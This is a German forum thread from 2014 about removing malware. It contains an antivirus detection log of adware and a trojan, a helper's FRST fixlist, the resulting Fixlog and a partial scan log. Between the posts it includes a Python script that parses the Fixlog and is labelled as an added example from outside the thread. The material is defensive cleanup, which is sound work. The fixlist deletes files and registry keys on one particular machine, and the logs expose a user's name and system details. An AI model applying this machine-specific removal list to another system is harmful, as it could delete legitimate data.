sh=D8EE2F7EDAA1162A78F494856FFC698F3FF1BF9C ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfkfdlcdbajamklbneflfbcmfgddmpae\0.3.6_0\js\newtab.js.vir"
sh=B396F756A1205B3D31CA61D39F14AEACC3204EFA ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfkfdlcdbajamklbneflfbcmfgddmpae\0.3.6_0\js\opentab.js.vir"
sh=E8BFDBDF96696001DADA38D358E7E8A3C5853864 ft=1 fh=ab9af29a36c60173 vn="Win32/VOPackage.AR evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Temp\VOPackage.exe.vir"
sh=035411E0DFE7FCA88DED1C14C2CA77A1C9F7544A ft=1 fh=68399f6ac6ea45c5 vn="Variante von Win32/DealPly.S evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Roaming\PriceFountain\UpdateProc\UpdateTask.exe.vir"
sh=B668E1E283E9022F2A1B63A169B9D0DE5A47B9E8 ft=1 fh=dfe0ee1fe01650bd vn="Win32/Agent.WGA Trojaner" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\rcore.exe.vir"
sh=E1A2C9DA921D9DA917ADE37B872D97E732A138BD ft=1 fh=a4119be6dfe53dd8 vn="Variante von Win32/Systweak.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\roboot.exe.vir"
sh=DF2EE142FC47845C6BAB1A6458973C682FD0CFE2 ft=1 fh=2a7450f30bd5c54d vn="Variante von Win64/BrowseFox.L evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{29302da5-1178-40ac-a178-4cb57ebcc501}t.sys.vir"
sh=4FE5DF78E7AEA9DD002366CA2055999B74BDEDE5 ft=1 fh=0fa4d303dd137a0e vn="Variante von Win64/BrowseFox.AG evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{2e8cd9f8-615c-4de8-88d4-cb904b118f81}t.sys.vir"
sh=D25E082DE21FC96B9A67EE769C431DE569DCE9AD ft=1 fh=5a17afef7a9ed79a vn="Variante von Win64/BrowseFox.AG evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{4627de76-5659-4dbc-90a4-d42cd39f6fc8}t.sys.vir"
sh=C04BF63D827FFF1D8F288703E33F7EE1F3CB64E8 ft=1 fh=8bcfe4dbd57c8b48 vn="Variante von Win64/BrowseFox.L evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{7012eec1-4f37-42d4-a2cd-26727494d248}t.sys.vir"
sh=FB8E4A98C102815DADE2EED2FB63BF473D9D452D ft=1 fh=6d5e9e0d63401dde vn="Variante von Win64/BrowseFox.AG evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{9f797875-3e17-4f05-af13-44c39bc9c2c2}t.sys.vir"
sh=DF1E5009FAB7F25A27D0E88097694CAA68702122 ft=1 fh=019c95e750afe991 vn="Variante von Win64/BrowseFox.L evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{a6762132-8e80-4305-b1ba-2bec91757ac2}t.sys.vir"
sh=C67426D27611309BFB425F23D683A9B4C4F02E8E ft=1 fh=386401652f540e1e vn="Variante von Win64/BrowseFox.L evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Windows\system32\drivers\{e9bebce7-deb3-4ab9-896c-549739f208c5}t.sys.vir"
sh=C4BB77B2DC9A6B33E8AEBFE9C7E2C6E84829EBA5 ft=1 fh=69ae750a9101650e vn="Win32/Adware.Pirrit.M Anwendung" ac=I fn="C:\TDSSKiller_Quarantine\05.12.2014_20.59.56\susp0000\svc0000\tsk0000.dta"
sh=B68145D2F6F55DF129ADDDC40F0FAFD7CB0327D5 ft=1 fh=835b711f313af3f1 vn="Win32/Adware.Pirrit.O Anwendung" ac=I fn="C:\TDSSKiller_Quarantine\05.12.2014_20.59.56\susp0001\svc0000\tsk0000.dta"
sh=C4BB77B2DC9A6B33E8AEBFE9C7E2C6E84829EBA5 ft=1 fh=69ae750a9101650e vn="Win32/Adware.Pirrit.M Anwendung" ac=I fn="C:\TDSSKiller_Quarantine\05.12.2014_20.59.56\susp0002\svc0000\tsk0000.dta"
sh=C4BB77B2DC9A6B33E8AEBFE9C7E2C6E84829EBA5 ft=1 fh=69ae750a9101650e vn="Win32/Adware.Pirrit.M Anwendung" ac=I fn="C:\TDSSKiller_Quarantine\05.12.2014_20.59.56\susp0003\svc0000\tsk0000.dta"
sh=C4BB77B2DC9A6B33E8AEBFE9C7E2C6E84829EBA5 ft=1 fh=69ae750a9101650e vn="Win32/Adware.Pirrit.M Anwendung" ac=I fn="C:\TDSSKiller_Quarantine\05.12.2014_20.59.56\susp0004\svc0000\tsk0000.dta"
sh=09E15C9675BE9BCA07B4DEC76EC3E1A407EF1663 ft=1 fh=62ef96bb58c196bb vn="Win32/NetToolDetect.B evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\AppData\Local\gnuutilityUI\SrDt.exe"
sh=DDD7E789E67132CF6C5D8169B2F46E3498FCA60F ft=0 fh=0000000000000000 vn="JS/Toolbar.Crossrider.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\AppData\Roaming\MQZDOUD"
sh=9413821E4285C46DAF48156B472065FC2D763FE8 ft=0 fh=0000000000000000 vn="JS/Toolbar.Crossrider.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\AppData\Roaming\XPGILDE"
sh=E4AE331440D89E1FEF79BC1D3D88E29450C25B37 ft=1 fh=2bec508ff15ca26e vn="Win32/OutBrowse.V evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\61C.tmp"
sh=BCEB518F8911E047E9DC5B0798B2C38B4260BFA3 ft=1 fh=28814f77d171d827 vn="MSIL/AdvancedSystemProtector.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\advancedfileoptimizersetup_backup (1).exe"
sh=BCEB518F8911E047E9DC5B0798B2C38B4260BFA3 ft=1 fh=28814f77d171d827 vn="MSIL/AdvancedSystemProtector.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\advancedfileoptimizersetup_backup.exe"
sh=BCEB518F8911E047E9DC5B0798B2C38B4260BFA3 ft=1 fh=28814f77d171d827 vn="MSIL/AdvancedSystemProtector.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\advancedfileoptimizersetup_GPX.exe"
sh=907DF0456F03AEAA8E44D2D9D3CD4558BA07B2DB ft=1 fh=6012deb93b048baa vn="Variante von Win32/InstallCore.PX evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\IDM2-Win-EN (1).exe"
sh=907DF0456F03AEAA8E44D2D9D3CD4558BA07B2DB ft=1 fh=6012deb93b048baa vn="Variante von Win32/InstallCore.PX evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\IDM2-Win-EN (2).exe"
sh=907DF0456F03AEAA8E44D2D9D3CD4558BA07B2DB ft=1 fh=6012deb93b048baa vn="Variante von Win32/InstallCore.PX evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\IDM2-Win-EN (3).exe"
sh=907DF0456F03AEAA8E44D2D9D3CD4558BA07B2DB ft=1 fh=6012deb93b048baa vn="Variante von Win32/InstallCore.PX evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\IDM2-Win-EN.exe"
sh=2D2172BB03B4481B6964FB05C6FC7A5F27422ED1 ft=1 fh=b92edb2a83ce662b vn="Variante von Win32/AirAdInstaller.D evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\installer_java_German.exe"
sh=2347149F788AB332FD70BC210E2AC4E1AA4F0784 ft=1 fh=cad23859fe802684 vn="Variante von Win32/PrimeCasino.B evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\Luxury.exe"
sh=4DA0EDC68F3812EFEB956B9F0E1E22D9A48507D8 ft=1 fh=a246f2ecc8442874 vn="Win32/Systweak.D evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop (1).exe"
sh=4DA0EDC68F3812EFEB956B9F0E1E22D9A48507D8 ft=1 fh=a246f2ecc8442874 vn="Win32/Systweak.D evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop.exe"
sh=27C9BD6A05DA87C72B722534F115E411C53D2DC4 ft=1 fh=dd66c373406c8aae vn="Win32/Systweak.K evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\tamnsp_26100739511631607.exe"
sh=6994FC133F3D99F1B1257370C9BC01BD54AF5D30 ft=1 fh=d1eb868415c0b931 vn="Variante von Win32/Toolbar.Conduit.AI evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\zaSetup_92_058_000_de.exe"
sh=C9352C798D66F96D4F894C2BC2CDAD192B662D62 ft=1 fh=7209dc7ad243ecb3 vn="Variante von Win32/Toolbar.Conduit.AI evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\zaSetup_92_105_000_de.exe"
         


06.12.2014, 22:24   #6
Machiavelli

Trojan.FakeMS.ED in dll-Datei



Please press the Windows key + R and type notepad into the Run window.

Now copy the following text from the code box into the empty text document

Code:
ATTFilter
C:\Users\finja\AppData\Local\gnuutilityUI
C:\Users\finja\AppData\Roaming\MQZDOUD
C:\Users\finja\AppData\Roaming\XPGILDE
C:\Users\finja\Downloads\61C.tmp
C:\Users\finja\Downloads\advancedfileoptimizersetup_backup (1).exe
C:\Users\finja\Downloads\advancedfileoptimizersetup_backup.exe
C:\Users\finja\Downloads\advancedfileoptimizersetup_GPX.exe
C:\Users\finja\Downloads\IDM2-Win-EN (1).exe
C:\Users\finja\Downloads\IDM2-Win-EN (2).exe
C:\Users\finja\Downloads\IDM2-Win-EN (3).exe
C:\Users\finja\Downloads\IDM2-Win-EN.exe
C:\Users\finja\Downloads\installer_java_German.exe
C:\Users\finja\Downloads\Luxury.exe
C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop (1).exe
C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop.exe
C:\Users\finja\Downloads\tamnsp_26100739511631607.exe
C:\Users\finja\Downloads\zaSetup_92_058_000_de.exe
C:\Users\finja\Downloads\zaSetup_92_105_000_de.exe
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a
FF Plugin HKU\S-1-5-21-717213786-2690546565-922636609-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files\Lightspark 0.5.3-git\nplightsparkplugin.dll No File
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi [Not Found]
FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found]
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - tylerkeith11@aol.com [Not Found]
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
S3 BS2521310881; \??\C:\Users\finja\AppData\Local\Temp\NTFS.sys [X]
2014-12-05 20:32 - 2014-12-05 20:32 - 00011842 _____ () C:\Windows\system32\.crusader
2014-12-05 20:01 - 2014-12-05 20:32 - 00000000 ____D () C:\Users\finja\AppData\Local\gnuutilityUI
2014-12-05 20:01 - 2014-12-05 20:02 - 00000000 ____D () C:\Windows\system32\guicca32
2014-11-06 20:47 - 2014-11-13 12:44 - 00000000 ____D () C:\ProgramData\boost_interprocess
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{5D39BBA0-67EE-42FE-8640-57C456AE4C8A}\InprocServer32 -> C:\Users\finja\AppData\LocalLow\WiseConvert_1.3_B2\prxtbWis0.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Users\finja\AppData\Local\Conduit\Community Alerts\Alert.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}\InprocServer32 -> C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll No File
         

Please save this as Fixlist.txt on your Desktop (or in the directory where FRST is located).
  • Now start FRST again and click the Entfernen (Fix) button.
  • The tool creates a Fixlog.txt.
  • Post its contents for me.

Then,

Please start FRST again, also tick the checkbox for Addition.txt and click Scan.
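As an added example (not part of this thread and not code from FRST itself): a small script that reads the result section of the Fixlog.txt that FRST writes after a fix and sorts each entry into removed, not found, or unknown, additionally flagging "not found" entries whose target the same run had already moved, which happens when a path is listed twice in the fixlist. The fixlog text inside the script is a constructed sample in the format of the log posted in this thread.

```python
"""Classify the result lines of an FRST Fixlog.txt.

Added example for this thread, not part of FRST or of the forum's tools.
FRST appends one outcome line per fixlist entry; grouping those lines lets a
helper see at a glance what was actually removed and which entries FRST could
not find (orphaned registry or extension entries are expected to come back as
"not found").
"""

# Constructed sample, modelled on the Fixlog format used in this thread.
SAMPLE_FIXLOG = """\
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 06-12-2014 02
Ran by finja at 2014-12-06 22:35:43 Run:2

==============================================

Content of fixlist:
*****************
C:\\Users\\finja\\AppData\\Local\\gnuutilityUI
C:\\Users\\finja\\Downloads\\Luxury.exe
HKU\\S-1-5-21-0-0-0-1000\\...\\MountPoints2: F - F:\\LaunchU3.exe -a
S3 BS2521310881; \\??\\C:\\Users\\finja\\AppData\\Local\\Temp\\NTFS.sys [X]
*****************

C:\\Users\\finja\\AppData\\Local\\gnuutilityUI => Moved successfully.
C:\\Users\\finja\\Downloads\\Luxury.exe => Moved successfully.
"HKU\\S-1-5-21-0-0-0-1000\\SOFTWARE\\...\\MountPoints2\\S-1-5-21-0-0-0-1000" => Key not found.
"HKU\\S-1-5-21-0-0-0-1000\\Software\\MozillaPlugins\\@lightspark.github.com/Lightspark;version=1" => Key deleted successfully.
C:\\Program Files\\Lightspark 0.5.3-git\\nplightsparkplugin.dll not found.
FF Extension: No Name - tylerkeith11@aol.com [Not Found] => not found.
BS2521310881 => Service deleted successfully.
"C:\\Users\\finja\\AppData\\Local\\gnuutilityUI" => File/Directory not found.

==== End of Fixlog ====
"""

# Outcome phrases FRST appends, grouped by what they mean for the cleanup.
REMOVED = ("Moved successfully.", "Key deleted successfully.",
           "Service deleted successfully.", "Value deleted successfully.")
NOT_FOUND = ("Key not found.", "File/Directory not found.", "not found.")


def result_section(fixlog):
    """Return the non-empty result lines: after the second '*****' separator
    that closes the echoed fixlist, up to the '==== End of Fixlog' marker."""
    lines = fixlog.splitlines()
    seps = [i for i, line in enumerate(lines) if line.strip() == "*****************"]
    if len(seps) < 2:
        raise ValueError("fixlog has no result section")
    out = []
    for line in lines[seps[1] + 1:]:
        if line.startswith("==== End of Fixlog"):
            break
        if line.strip():
            out.append(line)
    return out


def classify(line):
    """Split one result line into (target, status).

    status is 'removed', 'not_found' or 'unknown'. Most lines use
    '<target> => <outcome>'; a few (e.g. a missing plugin DLL) omit the arrow,
    so those are matched on the trailing outcome phrase instead."""
    if " => " in line:
        target, outcome = line.rsplit(" => ", 1)
    else:
        target, outcome = line, ""
        for phrase in REMOVED + NOT_FOUND:
            if line.endswith(" " + phrase):
                target, outcome = line[:-len(phrase) - 1], phrase
                break
    target = target.strip().strip('"')
    if outcome in REMOVED:
        return target, "removed"
    if outcome in NOT_FOUND:
        return target, "not_found"
    return target, "unknown"


def reconcile(fixlog):
    """Group every result line by status and flag 'not found' targets that the
    same run had already removed (a path listed twice in the fixlist)."""
    groups = {"removed": [], "not_found": [], "unknown": []}
    for line in result_section(fixlog):
        target, status = classify(line)
        groups[status].append(target)
    removed = set(groups["removed"])
    groups["already_removed"] = [t for t in groups["not_found"] if t in removed]
    return groups


if __name__ == "__main__":
    for status, targets in reconcile(SAMPLE_FIXLOG).items():
        print(f"{status} ({len(targets)}):")
        for t in targets:
            print("   ", t)
```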

06.12.2014, 22:39   #7
sbr_vfb

Trojan.FakeMS.ED in dll-Datei



Code:
ATTFilter
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 06-12-2014 02
Ran by finja at 2014-12-06 22:35:43 Run:2
Running from C:\Users\finja\Desktop
Loaded Profile: finja (Available profiles: finja)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
C:\Users\finja\AppData\Local\gnuutilityUI
C:\Users\finja\AppData\Roaming\MQZDOUD
C:\Users\finja\AppData\Roaming\XPGILDE
C:\Users\finja\Downloads\61C.tmp
C:\Users\finja\Downloads\advancedfileoptimizersetup_backup (1).exe
C:\Users\finja\Downloads\advancedfileoptimizersetup_backup.exe
C:\Users\finja\Downloads\advancedfileoptimizersetup_GPX.exe
C:\Users\finja\Downloads\IDM2-Win-EN (1).exe
C:\Users\finja\Downloads\IDM2-Win-EN (2).exe
C:\Users\finja\Downloads\IDM2-Win-EN (3).exe
C:\Users\finja\Downloads\IDM2-Win-EN.exe
C:\Users\finja\Downloads\installer_java_German.exe
C:\Users\finja\Downloads\Luxury.exe
C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop (1).exe
C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop.exe
C:\Users\finja\Downloads\tamnsp_26100739511631607.exe
C:\Users\finja\Downloads\zaSetup_92_058_000_de.exe
C:\Users\finja\Downloads\zaSetup_92_105_000_de.exe
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a
FF Plugin HKU\S-1-5-21-717213786-2690546565-922636609-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files\Lightspark 0.5.3-git\nplightsparkplugin.dll No File
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi [Not Found]
FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found]
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - tylerkeith11@aol.com [Not Found]
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
S3 BS2521310881; \??\C:\Users\finja\AppData\Local\Temp\NTFS.sys [X]
2014-12-05 20:32 - 2014-12-05 20:32 - 00011842 _____ () C:\Windows\system32\.crusader
2014-12-05 20:01 - 2014-12-05 20:32 - 00000000 ____D () C:\Users\finja\AppData\Local\gnuutilityUI
2014-12-05 20:01 - 2014-12-05 20:02 - 00000000 ____D () C:\Windows\system32\guicca32
2014-11-06 20:47 - 2014-11-13 12:44 - 00000000 ____D () C:\ProgramData\boost_interprocess
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{5D39BBA0-67EE-42FE-8640-57C456AE4C8A}\InprocServer32 -> C:\Users\finja\AppData\LocalLow\WiseConvert_1.3_B2\prxtbWis0.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Users\finja\AppData\Local\Conduit\Community Alerts\Alert.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}\InprocServer32 -> C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll No File
         
*****************

C:\Users\finja\AppData\Local\gnuutilityUI => Moved successfully.
C:\Users\finja\AppData\Roaming\MQZDOUD => Moved successfully.
C:\Users\finja\AppData\Roaming\XPGILDE => Moved successfully.
C:\Users\finja\Downloads\61C.tmp => Moved successfully.
C:\Users\finja\Downloads\advancedfileoptimizersetup_backup (1).exe => Moved successfully.
C:\Users\finja\Downloads\advancedfileoptimizersetup_backup.exe => Moved successfully.
C:\Users\finja\Downloads\advancedfileoptimizersetup_GPX.exe => Moved successfully.
C:\Users\finja\Downloads\IDM2-Win-EN (1).exe => Moved successfully.
C:\Users\finja\Downloads\IDM2-Win-EN (2).exe => Moved successfully.
C:\Users\finja\Downloads\IDM2-Win-EN (3).exe => Moved successfully.
C:\Users\finja\Downloads\IDM2-Win-EN.exe => Moved successfully.
C:\Users\finja\Downloads\installer_java_German.exe => Moved successfully.
C:\Users\finja\Downloads\Luxury.exe => Moved successfully.
C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop (1).exe => Moved successfully.
C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop.exe => Moved successfully.
C:\Users\finja\Downloads\tamnsp_26100739511631607.exe => Moved successfully.
C:\Users\finja\Downloads\zaSetup_92_058_000_de.exe => Moved successfully.
C:\Users\finja\Downloads\zaSetup_92_105_000_de.exe => Moved successfully.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\S-1-5-21-717213786-2690546565-922636609-1000" => Key not found.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\S-1-5-21-717213786-2690546565-922636609-1000" => Key not found.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000\Software\MozillaPlugins\@lightspark.github.com/Lightspark;version=1" => Key deleted successfully.
C:\Program Files\Lightspark 0.5.3-git\nplightsparkplugin.dll not found.
C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com => not found.
C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com => not found.
C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com => not found.
C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com => not found.
C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi => not found.
C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} => not found.
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found] => not found.
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found] => not found.
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found] => not found.
FF Extension: No Name - tylerkeith11@aol.com [Not Found] => not found.
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found] => not found.
BS2521310881 => Service deleted successfully.
C:\Windows\system32\.crusader => Moved successfully.
"C:\Users\finja\AppData\Local\gnuutilityUI" => File/Directory not found.
C:\Windows\system32\guicca32 => Moved successfully.
C:\ProgramData\boost_interprocess => Moved successfully.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{5D39BBA0-67EE-42FE-8640-57C456AE4C8A}" => Key deleted successfully.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}" => Key deleted successfully.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}" => Key deleted successfully.

==== End of Fixlog ====
         

FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 06-12-2014 02
Ran by finja (administrator) on FINJA-PC on 06-12-2014 22:36:43
Running from C:\Users\finja\Desktop
Loaded Profile: finja (Available profiles: finja)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: Deutsch (Deutschland)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
() C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe
(Dritek System Inc.) C:\Program Files\Launch Manager\LManager.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LSSrvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbam.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(1und1 Mail und Media GmbH) C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe


==================== Registry (Whitelisted) ==================

